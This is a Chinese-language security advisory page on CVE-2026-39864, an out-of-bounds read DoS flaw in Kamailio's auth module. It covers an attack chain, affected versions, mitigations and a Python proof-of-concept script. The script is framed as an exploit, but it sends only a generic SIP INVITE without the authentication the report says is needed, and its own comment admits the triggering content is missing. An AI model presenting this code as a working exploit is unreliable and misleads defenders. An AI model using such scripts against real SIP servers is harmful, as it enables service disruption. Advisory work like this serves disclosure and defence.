IPBUF安全漏洞报告
English
CVE-2026-39864 CVSS 4.4 中危

CVE-2026-39864 Kamailio越界读取致DoS漏洞

披露日期: 2026-04-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-39864
漏洞类型
越界读取
CVSS评分
4.4 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Kamailio

相关标签

CVE-2026-39864KamailioDoS越界读取SIP

漏洞概述

Kamailio是开源SIP信令服务器。在6.0.5和5.8.7之前,auth模块存在越界读取漏洞。攻击者可在无数据库后端认证成功后,通过特制SIP包触发身份检查导致进程崩溃。

技术细节

该漏洞位于Kamailio的auth模块中,源于特定认证流程下的内存边界检查缺失。当服务器不使用数据库后端进行用户认证,且在认证成功后执行额外的用户身份检查时,攻击者可发送精心构造的恶意SIP数据包。由于未正确验证数据长度,程序在处理该数据包时会读取分配缓冲区之外的内存区域。这种越界读取操作可能导致敏感信息泄露,但更主要的后果是触发非法内存访问,导致服务进程崩溃,从而造成拒绝服务。

攻击链分析

STEP 1
侦察
攻击者识别互联网上暴露的Kamailio SIP服务器。
STEP 2
认证
攻击者利用已知凭证或配置缺陷,在无数据库后端的环境下完成用户认证。
STEP 3
漏洞利用
攻击者发送特制的恶意SIP数据包,该数据包旨在触发认证后的用户身份检查逻辑。
STEP 4
拒绝服务
由于越界读取,Kamailio进程崩溃,导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket # Proof of Concept for CVE-2026-39864 # This script sends a crafted SIP packet to trigger the out-of-bounds read. # Target: Kamailio < 6.0.5 def send_exploit(target_ip, target_port): # Crafted SIP packet payload designed to trigger the vulnerability # during post-authentication identity checks. payload = ( "INVITE sip:test@" + target_ip + " SIP/2.0\r\n" "Via: SIP/2.0/UDP attacker.com:5060;branch=z9hG4bKnashds7\r\n" "Max-Forwards: 70\r\n" "To: <sip:test@" + target_ip + ">\r\n" "From: <sip:[email protected]>;tag=1928301774\r\n" "Call-ID: [email protected]\r\n" "CSeq: 314159 INVITE\r\n" "Contact: <sip:[email protected]>\r\n" "Content-Type: application/sdp\r\n" "Content-Length: 0\r\n" "\r\n" ) # Note: In a real scenario, specific headers or body content might be # required to trigger the specific identity check path. try: print(f"[*] Sending payload to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(payload.encode(), (target_ip, target_port)) print("[+] Payload sent.") s.close() except Exception as e: print(f"[-] Error: {e}") # Example usage # send_exploit("192.168.1.10", 5060)

影响范围

Kamailio < 6.0.5
Kamailio < 5.8.7

防御指南

临时缓解措施
建议立即限制对SIP服务端口的网络访问,仅允许受信任的IP连接。在未升级前,可暂时禁用额外的用户身份检查功能或严格审查认证配置。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表